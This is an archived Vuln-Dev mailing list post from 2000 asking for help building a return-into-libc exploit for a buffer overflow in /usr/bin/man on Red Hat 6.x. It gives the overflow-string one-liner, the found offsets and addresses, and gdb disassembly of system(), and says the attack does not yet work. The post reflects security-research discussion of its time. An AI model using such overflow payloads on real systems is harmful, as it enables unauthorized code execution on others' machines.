Vulnerability Development mailing list archives
No-Exec Stack Smashing 101
From: lamont () ICOPYRIGHT COM (Granquist, Lamont)
Date: Wed, 19 Apr 2000 16:31:40 -0700
Thought I'd try to liven the discussion up here a bit... Okay, so I'm setting off to exploit the /usr/bin/man MANPATH exploit on RH6.1 (actually my system is RH6.2 i686 with man-1.5g-6 installed on it). And I'm looking for a little help here. What I've been playing with so far is things like the following trying to sort out the parameters of the buffer overflow: setenv MANPAGER `perl -e 'print "A" x 4057; print "\xe0\xca\x05\x40"; /usr/bin/man man gdb /usr/bin/man core Now the goal is to make man do a system("/bin/echo i 0wn y3w") call via returning into system() with the string being a parameter to the call with no code being excuted on the stack. What I've found out is: 1. the RA is 4057 bytes beyond the start of the buffer 2. the beginning of the buffer is 0xbfffeae5 3. i have no idea how to properly call system() #3 is where I need the help, since I'm relatively x86-architecture and linux-kernel-hacking inexperienced. Using this: #include <stdio.h> int main(void) { system("/bin/echo foobar"); } I use gdb to disassemble to this: Dump of assembler code for function main: 0x80483c8 <main>: push %ebp 0x80483c9 <main+1>: mov %esp,%ebp 0x80483cb <main+3>: push $0x8048430 0x80483d0 <main+8>: call 0x80482e8 <system> 0x80483d5 <main+13>: add $0x4,%esp 0x80483d8 <main+16>: leave 0x80483d9 <main+17>: ret End of assembler dump. So, this appears to be system(): 0x80483cb <main+3>: push $0x8048430 0x80483d0 <main+8>: call 0x80482e8 <system> 0x80483d5 <main+13>: add $0x4,%esp So, it looks like I tack "0xbfffeae5" after the RA at wherever the top of the stack winds up being and system() will pop that off and off we go. However shoving 0x80482e8 into the RA like I naively assumed you could do doesn't appear to work. This is confirmed when I fire up gdb on the core file from man and try: (gdb) disassemble 0x80482e8 No function contains specified address. OTOH i noticed this: (gdb) disassemble system Dump of assembler code for function __libc_system: 0x4005cae0 <__libc_system>: push %ebp 0x4005cae1 <__libc_system+1>: mov %esp,%ebp 0x4005cae3 <__libc_system+3>: sub $0x2c8,%esp 0x4005cae9 <__libc_system+9>: push %edi 0x4005caea <__libc_system+10>: push %esi 0x4005caeb <__libc_system+11>: push %ebx 0x4005caec <__libc_system+12>: call 0x4005caf1 <__libc_system+17> 0x4005caf1 <__libc_system+17>: pop %ebx 0x4005caf2 <__libc_system+18>: add $0xaf6fb,%ebx [...blah...blah...blah...] So, anyone got any tips for where to point the RA and what the stack should look like?
Current thread:
- No-Exec Stack Smashing 101 Granquist, Lamont (Apr 19)
- Re: No-Exec Stack Smashing 101 Crispin Cowan (Apr 19)
- Re: No-Exec Stack Smashing 101 M.C.Mar (Apr 20)
- Re: No-Exec Stack Smashing 101 M.C.Mar (Apr 20)
- Re: No-Exec Stack Smashing 101 Granquist, Lamont (Apr 20)
- Re: No-Exec Stack Smashing 101 M.C.Mar (Apr 20)
- Re: No-Exec Stack Smashing 101 Granquist, Lamont (Apr 20)
- Re: No-Exec Stack Smashing 101 Mariusz Woloszyn (Apr 21)
- Securax Security Advisory: Windows98 contains a serious buffer overflow with long filenameextensions. Zoa_Chien (Apr 21)
- Re: Securax Security Advisory: Windows98 contains a serious buffer overflow with long filenameextensions. Bob Fiero (Apr 21)
- Re: Securax Security Advisory: Windows98 contains a serious buffer overflow with long filenameextensions. Ron DuFresne (Apr 21)
- Re: No-Exec Stack Smashing 101 M.C.Mar (Apr 20)
- Re: No-Exec Stack Smashing 101 Crispin Cowan (Apr 19)